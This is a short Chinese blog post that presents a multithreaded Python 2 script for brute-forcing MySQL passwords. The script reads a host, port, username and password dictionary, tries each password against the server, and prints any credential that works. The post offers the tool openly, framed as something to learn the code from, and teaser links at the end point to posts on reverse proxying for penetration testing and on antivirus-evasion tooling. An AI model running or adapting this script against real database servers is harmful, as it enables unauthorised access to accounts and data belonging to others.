MySQL demolition script

别再说珍重,我只剩忧愁。

一个mysql爆破的脚本,某司里面一个表哥发的,虽然爆破的软件很多,但是个人觉得主要是学习代码。
code:

import pymysql
import argparse
import threading,Queue
import os,sys
from time import ctime,sleep


parse = argparse.ArgumentParser()
parse.add_argument('host', help='host')
parse.add_argument('port', help='port',type=int)
parse.add_argument('username', help='user' )
parse.add_argument('dict', help='pass')
parse.add_argument('-t', help='Thread',type=int,default=10)
args = parse.parse_args()

q = Queue.Queue()

flag = True

def Attrack():
    global flag
    while not q.empty():
        try:
            pwd = q.get()
            conn = pymysql.connect(host=args.host,port=args.port,user=args.username,password=pwd)
            print '[+] user:root'
            print '[+] passwprd:' + pwd
            flag = False
        except pymysql.err.OperationalError:
            pass
def main():
    file = args.dict
    f = open(file, 'r').read()
    list = f.split('\n')
    print 'total:' +  str(len(list)) + 'items'

    for i in list:
        q.put(i)
    print '[+}star time:' + ctime()

    for i in range(args.t):
        t =threading.Thread(target=Attrack)
        t.start()
    while flag:
        sleep(1)
    print '[+]end time:' + ctime()
if __name__ == '__main__':
    main()

argparse这个模块我只会粗略使用,但是很好用。
ps:传递参数如果是int类型,要在add_argument
设置typeint,如:端口等等。


   转载规则


《MySQL demolition script》 Wing 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
ngrok内网穿透 ngrok内网穿透
0X00 前言在渗透测试过程中,可能目标主机是内网里面的机器,由于外网无法直接访问内网,我们就需要反向代理,来为下一步的工作做准备。 0X01 ngrok简介ngrok是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一
2017-10-05
下一篇 
she11ter she11ter
我们在时光交错中偶然碰头,不曾想你会转身就走! 0X00 简介shellter是一个开源的免杀工具,动态注入shellcode,继而实现免杀! 0X01 安装apt-get install shellter 0X02 演示命令行输
2017-09-28
  目录